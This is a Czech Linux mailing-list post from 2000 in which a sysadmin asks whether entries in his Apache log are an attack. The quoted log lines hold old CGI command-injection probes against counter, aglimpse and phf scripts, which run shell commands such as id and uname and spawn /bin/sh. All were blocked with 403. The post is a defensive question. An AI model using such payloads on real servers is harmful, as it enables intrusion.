pokus o utok pres http ?
Petr Skoda
skoda na sunstel.asu.cas.cz
Čtvrtek Květen 4 10:45:18 CEST 2000
Vazeni tohle se mi objevilo v logu apache (mam zatim host.deny vsude krome
nasi podsite, takze zjevne neuspel, ale nelibi se mi to - zvlaste zminky o
shellu. Je to nejaky pokus o utok ?
[skoda na alhena httpd]$ more access_log.3
strauss.udel.edu - - [14/Apr/2000:03:09:22 +0200] "GET
/cgi-bin/counter/nl/ord/l
ang=english(1);system("$ENV{HTTP_X}"); HTTP/1.0" 403 333
strauss.udel.edu - - [14/Apr/2000:03:09:54 +0200] "POST /cgi-bin/test-cgi
HTTP/1
.0" 403 287
strauss.udel.edu - - [14/Apr/2000:03:10:18 +0200] "GET
/cgi-bin/aglimpse/80|IFS=
_;CMD=_echo\;echo_id-aglimpse\;uname_-a\;id;eval$CMD; HTTP/1.0" 403 348
strauss.udel.edu - - [14/Apr/2000:03:10:34 +0200] "POST
/cgi-bin/phf?Qname=x%0a/
bin/sh+-s%0a HTTP/1.0" 403 282
podotykam, ze zadne takove cgi-bin skripty nemam , ale o glimpsu jsem
uvazoval - je v nem nejaka chyba ?
Diky za stopy
*************************************************************************
* Petr Skoda Tel : (0204) 649201, l. 361 *
* Stelarni oddeleni (0204) 620361, 620136 *
* Astronomicky ustav AVCR Fax : (0204) 620250 *
* 251 65 Ondrejov e-mail: skoda na sunstel.asu.cas.cz *
* Ceska republika pskoda na mbox.cesnet.cz *
*************************************************************************
Další informace o konferenci Linux